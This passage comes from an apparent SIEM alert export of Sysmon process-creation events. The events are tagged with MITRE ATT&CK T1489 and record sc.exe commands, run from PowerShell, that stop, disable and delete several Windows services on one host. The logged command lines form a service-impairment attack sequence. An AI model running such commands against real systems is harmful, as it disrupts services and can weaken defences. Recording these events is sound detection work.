MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.341"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-0010de132b00}"",""processId"":""4240"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.398",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.192 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-00106c122b00} +ProcessId: 7804 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.239281600Z"",""eventRecordID"":""3162"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.192\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-00106c122b00}\r\nProcessId: 7804\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.192"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-00106c122b00}"",""processId"":""7804"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.270",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:51:26.144 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-00105f0f2b00} +ProcessId: 8064 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.146924900Z"",""eventRecordID"":""3159"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.144\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-00105f0f2b00}\r\nProcessId: 8064\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.144"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-00105f0f2b00}"",""processId"":""8064"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.081",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.096 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010b60b2b00} +ProcessId: 5728 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.101634100Z"",""eventRecordID"":""3156"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.096\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010b60b2b00}\r\nProcessId: 5728\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.096"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-0010b60b2b00}"",""processId"":""5728"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.038",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.081 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010630a2b00} +ProcessId: 8188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Nationalwpi Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Nationalwpi Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.085706900Z"",""eventRecordID"":""3155"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.081\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010630a2b00}\r\nProcessId: 8188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Nationalwpi Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:26.081"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-0010630a2b00}"",""processId"":""8188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Nationalwpi Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:55.001",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:26.044 +ProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010ef072b00} +ProcessId: 7744 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:26.048020400Z"",""eventRecordID"":""3153"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:26.044\r\nProcessGuid: {df9fc3d3-b3ce-5ecf-0000-0010ef072b00}\r\nProcessId: 7744\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:26.044"",""processGuid"":""{df9fc3d3-b3ce-5ecf-0000-0010ef072b00}"",""processId"":""7744"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:54.825",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:25.985 +ProcessGuid: {df9fc3d3-b3cd-5ecf-0000-00108f042b00} +ProcessId: 612 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:25.987871600Z"",""eventRecordID"":""3150"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:25.985\r\nProcessGuid: {df9fc3d3-b3cd-5ecf-0000-00108f042b00}\r\nProcessId: 612\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
